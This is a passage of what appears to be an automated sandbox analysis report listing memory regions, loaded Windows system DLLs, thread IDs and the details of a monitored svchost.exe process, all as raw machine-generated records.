0x7ff855c20000 end_va = 0x7ff855c98fff monitored = 0 entry_point = 0x7ff855c37800 region_type = mapped_file name = "geolocation.dll" filename = "\\Windows\\System32\\Geolocation.dll" (normalized: "c:\\windows\\system32\\geolocation.dll") Region: id = 3835 start_va = 0x7ff856890000 end_va = 0x7ff8568a7fff monitored = 0 entry_point = 0x7ff856895910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 3836 start_va = 0x7ff856d50000 end_va = 0x7ff856d7bfff monitored = 0 entry_point = 0x7ff856d51d20 region_type = mapped_file name = "authbroker.dll" filename = "\\Windows\\System32\\AuthBroker.dll" (normalized: "c:\\windows\\system32\\authbroker.dll") Region: id = 3837 start_va = 0x7ff856dc0000 end_va = 0x7ff857252fff monitored = 0 entry_point = 0x7ff856dcf760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 3838 start_va = 0x7ff858130000 end_va = 0x7ff858156fff monitored = 0 entry_point = 0x7ff858137940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 3839 start_va = 0x7ff858160000 end_va = 0x7ff858209fff monitored = 0 entry_point = 0x7ff858187910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 3840 start_va = 0x7ff858210000 end_va = 0x7ff85830ffff monitored = 0 entry_point = 0x7ff858250f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 3841 start_va = 0x7ff8586f0000 end_va = 0x7ff858713fff monitored = 0 entry_point = 0x7ff8586f3260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 3842 start_va = 0x7ff858890000 end_va = 0x7ff858983fff monitored = 0 entry_point = 0x7ff85889a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 3843 start_va = 0x7ff858b00000 end_va = 0x7ff858b0bfff monitored = 0 entry_point = 0x7ff858b027e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 3844 start_va = 0x7ff858d00000 end_va = 0x7ff858d33fff monitored = 0 entry_point = 0x7ff858d1ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3845 start_va = 0x7ff858d40000 end_va = 0x7ff858d49fff monitored = 0 entry_point = 0x7ff858d41830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 3846 start_va = 0x7ff858e50000 end_va = 0x7ff858e6efff monitored = 0 entry_point = 0x7ff858e55d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 3847 start_va = 0x7ff858fc0000 end_va = 0x7ff85901bfff monitored = 0 entry_point = 0x7ff858fd6f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 3848 start_va = 0x7ff8590d0000 end_va = 0x7ff8590e6fff monitored = 0 entry_point = 0x7ff8590d79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3849 start_va = 0x7ff8591f0000 end_va = 0x7ff8591fafff monitored = 0 entry_point = 0x7ff8591f19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3850 start_va = 0x7ff859580000 end_va = 0x7ff8595a8fff monitored = 0 entry_point = 0x7ff859594530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 3851 start_va = 0x7ff8595b0000 end_va = 0x7ff859648fff monitored = 0 entry_point = 0x7ff8595df4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 3852 start_va = 0x7ff8596f0000 end_va = 0x7ff8596fffff monitored = 0 entry_point = 0x7ff8596f56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3853 start_va = 0x7ff859700000 end_va = 0x7ff859713fff monitored = 0 entry_point = 0x7ff8597052e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3854 start_va = 0x7ff859720000 end_va = 0x7ff85972efff monitored = 0 entry_point = 0x7ff859723210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 3855 start_va = 0x7ff859730000 end_va = 0x7ff85977afff monitored = 0 entry_point = 0x7ff8597335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 3856 start_va = 0x7ff859850000 end_va = 0x7ff859a16fff monitored = 0 entry_point = 0x7ff8598adb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3857 start_va = 0x7ff859a20000 end_va = 0x7ff859c07fff monitored = 0 entry_point = 0x7ff859a4ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3858 start_va = 0x7ff859c10000 end_va = 0x7ff859c64fff monitored = 0 entry_point = 0x7ff859c27970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 3859 start_va = 0x7ff859c70000 end_va = 0x7ff85a2b3fff monitored = 0 entry_point = 0x7ff859e364b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 3860 start_va = 0x7ff85a2c0000 end_va = 0x7ff85a329fff monitored = 0 entry_point = 0x7ff85a2f6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 3861 start_va = 0x7ff85a3c0000 end_va = 0x7ff85a402fff monitored = 0 entry_point = 0x7ff85a3d4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 3862 start_va = 0x7ff85a410000 end_va = 0x7ff85a4c4fff monitored = 0 entry_point = 0x7ff85a4522e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 3863 start_va = 0x7ff85a4d0000 end_va = 0x7ff85a521fff monitored = 0 entry_point = 0x7ff85a4df530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3864 start_va = 0x7ff85a530000 end_va = 0x7ff85a537fff monitored = 0 entry_point = 0x7ff85a531ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3865 start_va = 0x7ff85bcb0000 end_va = 0x7ff85be05fff monitored = 0 entry_point = 0x7ff85bcba8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3866 start_va = 0x7ff85bea0000 end_va = 0x7ff85bfbbfff monitored = 0 entry_point = 0x7ff85bee02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3867 start_va = 0x7ff85bfd0000 end_va = 0x7ff85c076fff monitored = 0 entry_point = 0x7ff85bfe58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3868 start_va = 0x7ff85c080000 end_va = 0x7ff85c126fff monitored = 0 entry_point = 0x7ff85c08b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3869 start_va = 0x7ff85c130000 end_va = 0x7ff85c1f0fff monitored = 0 entry_point = 0x7ff85c150da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3870 start_va = 0x7ff85c360000 end_va = 0x7ff85c3fcfff monitored = 0 entry_point = 0x7ff85c3678a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3871 start_va = 0x7ff85c410000 end_va = 0x7ff85c552fff monitored = 0 entry_point = 0x7ff85c438210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3872 start_va = 0x7ff85c560000 end_va = 0x7ff85c6e5fff monitored = 0 entry_point = 0x7ff85c5affc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3873 start_va = 0x7ff85cb80000 end_va = 0x7ff85cc2cfff monitored = 0 entry_point = 0x7ff85cb981a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3874 start_va = 0x7ff85cc30000 end_va = 0x7ff85cc8afff monitored = 0 entry_point = 0x7ff85cc438b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3875 start_va = 0x7ff85cc90000 end_va = 0x7ff85cf0cfff monitored = 0 entry_point = 0x7ff85cd64970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3876 start_va = 0x7ff85cf10000 end_va = 0x7ff85cf7afff monitored = 0 entry_point = 0x7ff85cf290c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3877 start_va = 0x7ff85d0d0000 end_va = 0x7ff85d290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 393 os_tid = 0xcf4 Thread: id = 394 os_tid = 0x830 Thread: id = 395 os_tid = 0x81c Thread: id = 396 os_tid = 0x814 Thread: id = 397 os_tid = 0x80c Thread: id = 398 os_tid = 0x654 Thread: id = 399 os_tid = 0x7ac Thread: id = 400 os_tid = 0x6e0 Thread: id = 401 os_tid = 0x594 Thread: id = 402 os_tid = 0x590 Thread: id = 403 os_tid = 0x514 Thread: id = 404 os_tid = 0x510 Thread: id = 405 os_tid = 0x50c Thread: id = 406 os_tid = 0x508 Thread: id = 407 os_tid = 0x504 Thread: id = 408 os_tid = 0x4fc Thread: id = 409 os_tid = 0x4f4 Thread: id = 410 os_tid = 0x428 Thread: id = 411 os_tid = 0x424 Thread: id = 412 os_tid = 0x420 Thread: id = 413 os_tid = 0xf0 Thread: id = 414 os_tid = 0x158 Thread: id = 415 os_tid = 0x150 Thread: id = 416 os_tid = 0x140 Thread: id = 417 os_tid = 0x3d8 Process: id = "32" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x54242000" os_pid = "0x164" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x214" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xa], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\DeviceAssociationService" [0xa], "NT SERVICE\\DevQueryBroker" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\DsSvc" [0xa], "NT SERVICE\\fhsvc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\NcbService" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\NgcSvc" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\ScDeviceEnum" [0xa], "NT SERVICE\\SensorService" [0xa], "NT SERVICE\\SmsRouter" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\svsvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\vmicguestinterface" [0xa], "NT SERVICE\\vmickvpexchange" [0xa], "NT SERVICE\\vmicshutdown" [0xa], "NT SERVICE\\vmicvmsession" [0xa], "NT SERVICE\\vmicvss" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\WiaRpc" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xe], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dce0" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 3950 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3951 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3952 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3953 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 3954 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 3955 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 3956 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 3957 start_va = 0x100000 end_va = 0x100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 3958 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 3959 start_va = 0x120000 end_va = 0x120fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 3960 start_va = 0x130000 end_va = 0x130fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 3961 start_va = 0x140000 end_va = 0x140fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 3962 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 3963 start_va = 0x160000 end_va = 0x166fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3964 start_va = 0x170000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3965 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 3966 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3967 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3968 start_va = 0x500000 end_va = 0x5bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3969 start_va = 0x5c0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mmdevapi.dll.mui" filename = "\\Windows\\System32\\en-US\\MMDevAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mmdevapi.dll.mui") Region: id = 3970 start_va = 0x5d0000 end_va = 0x5d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "audioendpointbuilder.dll.mui" filename = "\\Windows\\System32\\en-US\\AudioEndpointBuilder.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\audioendpointbuilder.dll.mui") Region: id = 3971 start_va = 0x5e0000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 3972 start_va = 0x660000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 3973 start_va = 0x670000 end_va = 0x676fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 3974 start_va = 0x680000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 3975 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 3976 start_va = 0x800000 end_va = 0x987fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 3977 start_va = 0x990000 end_va = 0xb10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 3978 start_va = 0xb20000 end_va = 0xbdffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 3979 start_va = 0xbe0000 end_va = 0xfdafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000be0000" filename = "" Region: id = 3980 start_va = 0xfe0000 end_va = 0x105ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 3981 start_va = 0x1060000 end_va = 0x10dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001060000" filename = "" Region: id = 3982 start_va = 0x10e0000 end_va = 0x1110fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pfpre_e95f858f.mkd" filename = "\\Windows\\Prefetch\\PfPre_e95f858f.mkd" (normalized: "c:\\windows\\prefetch\\pfpre_e95f858f.mkd") Region: id = 3983 start_va = 0x1150000 end_va = 0x1156fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 3984 start_va = 0x1160000 end_va = 0x11b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 3985 start_va = 0x1200000 end_va = 0x12fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 3986 start_va = 0x1300000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 3987 start_va = 0x1400000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 3988 start_va = 0x1500000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 3989 start_va = 0x1600000 end_va = 0x16fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 3990 start_va = 0x1700000 end_va = 0x17fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001700000" filename = "" Region: id = 3991 start_va = 0x1800000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 3992 start_va = 0x1900000 end_va = 0x1c36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3993 start_va = 0x1d00000 end_va = 0x1dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 3994 start_va = 0x1e40000 end_va = 0x1e46fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 3995 start_va = 0x1e50000 end_va = 0x1e93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3996 start_va = 0x1f00000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 3997 start_va = 0x20d0000 end_va = 0x20d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020d0000" filename = "" Region: id = 3998 start_va = 0x2100000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 3999 start_va = 0x2200000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 4000 start_va = 0x2300000 end_va = 0x23fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 4001 start_va = 0x2400000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 4002 start_va = 0x2500000 end_va = 0x25bafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 4003 start_va = 0x2600000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 4004 start_va = 0x2700000 end_va = 0x2afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 4005 start_va = 0x2b00000 end_va = 0x2bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 4006 start_va = 0x2c00000 end_va = 0x2cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 4007 start_va = 0x2d00000 end_va = 0x2dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 4008 start_va = 0x2e00000 end_va = 0x2efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 4009 start_va = 0x2f00000 end_va = 0x2ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 4010 start_va = 0x3000000 end_va = 0x30fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 4011 start_va = 0x3100000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 4012 start_va = 0x3200000 end_va = 0x32fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 4013 start_va = 0x3300000 end_va = 0x33fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 4014 start_va = 0x3400000 end_va = 0x34fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 4015 start_va = 0x3500000 end_va = 0x35fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003500000" filename = "" Region: id = 4016 start_va = 0x3600000 end_va = 0x36fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 4017 start_va = 0x3700000 end_va = 0x37fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003700000" filename = "" Region: id = 4018 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4019 start_va = 0x7fff0000 end_va = 0x17ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4020 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 4021 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 4022 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 4023 start_va = 0x7ff6c7f10000 end_va = 0x7ff6c7f1cfff monitored = 0 entry_point = 0x7ff6c7f13980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 4024 start_va = 0x7ff849390000 end_va = 0x7ff8493e7fff monitored = 0 entry_point = 0x7ff8493a7f80 region_type = mapped_file name = "ncbservice.dll" filename = "\\Windows\\System32\\ncbservice.dll" (normalized: "c:\\windows\\system32\\ncbservice.dll") Region: id = 4025 start_va = 0x7ff84c870000 end_va = 0x7ff84c8b3fff monitored = 0 entry_point = 0x7ff84c87c010 region_type = mapped_file name = "execmodelclient.dll" filename = "\\Windows\\System32\\ExecModelClient.dll" (normalized: "c:\\windows\\system32\\execmodelclient.dll") Region: id = 4026 start_va = 0x7ff84cf20000 end_va = 0x7ff84cf3afff monitored = 0 entry_point = 0x7ff84cf21040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 4027 start_va = 0x7ff84f2f0000 end_va = 0x7ff84f2fffff monitored = 0 entry_point = 0x7ff84f2f3d50 region_type = mapped_file name = "pcacli.dll" filename = "\\Windows\\System32\\pcacli.dll" (normalized: "c:\\windows\\system32\\pcacli.dll") Region: id = 4028 start_va = 0x7ff84f320000 end_va = 0x7ff84f32ffff monitored = 0 entry_point = 0x7ff84f321ec0 region_type = mapped_file name = "pcadm.dll" filename = "\\Windows\\System32\\pcadm.dll" (normalized: "c:\\windows\\system32\\pcadm.dll") Region: id = 4029 start_va = 0x7ff84f940000 end_va = 0x7ff84f97ffff monitored = 0 entry_point = 0x7ff84f956c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 4030 start_va = 0x7ff84fd80000 end_va = 0x7ff84fda1fff monitored = 0 entry_point = 0x7ff84fd8adf0 region_type = mapped_file name = "trkwks.dll" filename = "\\Windows\\System32\\trkwks.dll" (normalized: "c:\\windows\\system32\\trkwks.dll") Region: id = 4031 start_va = 0x7ff84ff20000 end_va = 0x7ff84ff3cfff monitored = 0 entry_point = 0x7ff84ff26190 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 4032 start_va = 0x7ff84ff40000 end_va = 0x7ff84ffc4fff monitored = 0 entry_point = 0x7ff84ff59a10 region_type = mapped_file name = "pcasvc.dll" filename = "\\Windows\\System32\\pcasvc.dll" (normalized: "c:\\windows\\system32\\pcasvc.dll") Region: id = 4033 start_va = 0x7ff850050000 end_va = 0x7ff85015dfff monitored = 0 entry_point = 0x7ff8500b7960 region_type = mapped_file name = "sysmain.dll" filename = "\\Windows\\System32\\sysmain.dll" (normalized: "c:\\windows\\system32\\sysmain.dll") Region: id = 4034 start_va = 0x7ff851c10000 end_va = 0x7ff851c18fff monitored = 0 entry_point = 0x7ff851c121d0 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 4035 start_va = 0x7ff8523a0000 end_va = 0x7ff8523d5fff monitored = 0 entry_point = 0x7ff8523a86d0 region_type = mapped_file name = "wudfplatform.dll" filename = "\\Windows\\System32\\WUDFPlatform.dll" (normalized: 